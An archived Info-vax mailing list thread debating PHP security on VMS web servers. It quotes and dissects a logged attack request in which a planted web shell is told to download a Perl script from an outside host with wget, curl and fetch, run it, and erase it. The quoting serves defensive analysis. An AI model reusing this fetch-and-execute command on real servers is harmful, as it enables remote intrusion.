[Info-vax] Using VMS for a web server

Jan-Erik Soderholm jan-erik.soderholm at telia.com
Wed Jun 10 02:17:07 EDT 2015 

Dirk Munk skrev den 2015-06-10 07:58:
> Jan-Erik Soderholm wrote:
>> Bill Gunshannon skrev den 2015-06-09 16:49:
>>> In article <ml6qf1$d82$1 at news.albasani.net>,
>>>     Jan-Erik Soderholm <jan-erik.soderholm at telia.com> writes:
>>>>
>>>>
>>>> It would be nice to have a reproducer and test it out.
>>>> Or at least a pointer to a description.
>>>>
>>> ....
>>>>
>>>> OK. I have only read quite a lot about PHP and it's "problems"
>>>> but never used it or had it installed on any server.
>>>>
>>>> But it would surprice me *a lot* if there wasn't an available
>>>> fix for a simple URL based exploit...
>>>
>>> OK, I wasn't busy (some of these updates are like watching paint dry!)
>>> so here is just one to look at.
>>>
>>> First, a log entry (sanatized a bit as I don't really need someone else
>>> trying this):
>>>
>>> 103.14.141.213 - - [14/Mar/2015:20:36:36 -0400] "GET
>>> /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt*
>>>
>>> HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
>>> rv:1.9.2) Gecko/20100115 Firefox/3.6"
>>>
>>>
>>> Now, let's pull out the applicable part:
>>>
>>> "GET
>>> /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt*
>>>
>>> HTTP/1.1"
>>>
>>> Now we analyze it:
>>>
>>> "GET
>>> /xxxxxxxxxx/xxxxxxx/revslider/temp/update_extract/revslider/XXXXXX.php
>>>
>>> There is a request to get a PHP script.
>>>
>>> Note immedately after this part is "?cmd="        Hmmmmmm......
>>>
>>> And what is the command?
>>>
>>> wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.c
>>>
>>>
>>> o.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;
>>>
>>>
>>> rm%20-rf%20qtalk.txt*
>>>
>>> And if we break it down:
>>>
>>> wget%20http://identerprise.co.kr/css/qtalk.txt;
>>>
>>> curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;
>>>
>>> fetch%20http://identerprise.co.kr/css/b.txt;
>>>
>>> perl%20qtalk.txt;
>>>
>>> rm%20-rf%20qtalk.txt*
>>>
>>>
>>> So, the attacker uses a hole in PHP to download a Perl script, using
>>> three
>>> common ways of doing it (I don't know if any of these are available on
>>> VMS
>>> but I suspect curl or wget might be).  He then runs it.  And when he
>>> is done
>>> he cleans up his tracks.
>>>
>>> What does it do?  No idea.  The point is to show something that PHP
>>> allows
>>> as a "feature" that makes it probably the worst possible web scripting
>>> language.
>>>
>>> I have seen this method used to download a telnet daemon written in
>>> either
>>> PHP or Perl.  This allows outsiders who do not have an account on a
>>> system
>>> to get in for a look around.  Good way to look security shortcomings.
>>>
>>> bill
>>>
>>
>> OK. That needs a script called wawalo.php already beeing on the server
>> in a directory where the server can execute it. The exploit is realy
>> to be able to upload the wawalo.php file in the first place.
>>
>> If you have a server setup where someone can both upload a random
>> file and then also execute that file just like that frm the same
>> directory, you have a severe problem.
>>
>> Now, is this a "hole in PHP"? Or could the same thing be done
>> using any tool that can take an input parameter and execute it?
>>
>> I guess any scripting tool could be used to write such a script.
>> Many scripting languages are able to take a string and execute it.
>>
>> Can this be done on an WASD/VMS server? Not if you do not have
>> file upload enabled, at least. And you also need execute rights
>> on the upload directory.
>
> Is that true? After all, a script file is not an executable. It is 'just' a
> file  to be read by the PHP runtime executable, and then PHP is doing the
> actual processing.

Yes, from a strict VMS perspective. But you also either must have
a global mapping rule in your web config that allows PHP files to
be run from anyware. Or a specific mapping rule allowing PHP files
to be run from the actual directory. If not, the web server will
not run the PHP file at all, will it?


>
> So the question is if script languages in a way undermine the VMS security
> setup.

Not generally. They run in the same process context. A scripting
language should not be allowed to do more then the process itself.



>
>> You can also set it up so thet PHP
>> script can only be executed from a safe "script" directory
>> with no external write access.
>>
>> But again, is it realy a "hole in PHP" ?? I'm not sure...
>>
>>
>> Jan-Erik.
>>
>

More information about the Info-vax mailing list